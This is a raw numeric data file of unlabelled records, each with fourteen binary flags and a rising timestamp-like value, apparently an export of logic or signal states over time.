1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878228e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878248e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878272e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878324e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878348e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878352e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878404e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878472e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878496e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878500e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878548e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878580e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878672e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878724e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878748e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878752e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878796e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878844e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878872e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878896e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3878924e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3878948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3878956e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3878996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879072e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879124e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879272e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879324e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3879428e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3879472e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3879500e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879504e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879548e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879572e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,2.3879576e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3879580e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3879596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3879620e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3879644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3879672e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3879696e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3879724e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879728e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879872e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879896e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879924e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879948e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3879972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3879996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880004e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3880048e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880072e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3880076e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880080e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880124e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880272e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880324e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880376e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3880420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880448e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880452e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880472e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880496e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880524e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880604e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3880648e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880672e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3880676e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880680e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880724e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880748e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880752e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3880772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880796e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3880820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880844e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3880872e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3880896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880904e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3880972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3880996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881020e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881028e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3881072e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881104e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881268e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881276e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3881292e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881324e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881344e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881468e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881492e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881520e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881600e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3881644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881676e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881720e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881744e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881844e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,2.3881848e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881852e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3881892e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3881920e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3881924e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881928e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3881972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3881996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3882000e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3882020e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3882044e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3882068e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3882092e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.3882120e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.3882144e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.3882148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882152e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882268e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882292e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882344e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882468e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882492e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882520e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882668e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882692e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882720e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882744e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882920e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882944e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3882972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3882996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3883020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.3883044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.3883068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.4007220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.4007412e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4007436e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,2.4007460e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4007488e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4007776e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4007804e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4007828e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4007852e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.4007856e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.4007876e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.4007900e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.4007924e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.4007952e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.4007976e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.4008004e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,1,2.4008008e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4008012e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008076e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008128e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008132e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4008152e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008176e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4008204e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008228e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008236e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008252e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008276e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008300e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008352e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008376e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008380e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4008428e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008460e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008500e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008504e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4008548e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008580e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008600e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008624e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008676e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008800e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008824e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008876e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4008948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4008972e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4008980e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4009000e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009024e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4009052e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009076e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4009100e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009132e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009176e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009200e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009224e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009252e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009300e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009352e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009376e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009404e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009428e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009500e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009552e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009576e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009628e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009652e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009656e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4009700e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009728e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.4009732e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009736e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009752e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009776e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009804e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009828e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009876e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009884e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4009928e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4009952e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4009960e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4009980e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,2.4010004e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010008e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4010052e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010076e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010084e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010124e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010152e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010176e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010204e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010228e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010232e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4010276e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010300e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010308e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010328e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010352e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010376e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010404e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4010428e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010460e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010528e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010580e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010628e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010652e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010676e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010700e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010708e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4010724e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4010752e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.4010756e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010760e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010776e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010804e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010828e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010852e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010876e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010900e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010928e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4010952e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4010980e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011004e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011028e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011052e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011076e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011100e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011128e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011152e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011156e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4011204e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011228e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4011252e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011284e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011300e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011352e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011376e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011404e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011428e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011432e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4011476e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011508e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011528e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011552e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011576e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011628e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011652e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011676e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011700e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011708e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4011752e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4011780e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011784e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011804e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011828e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011876e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4011952e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4011976e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012004e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012028e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012076e-02 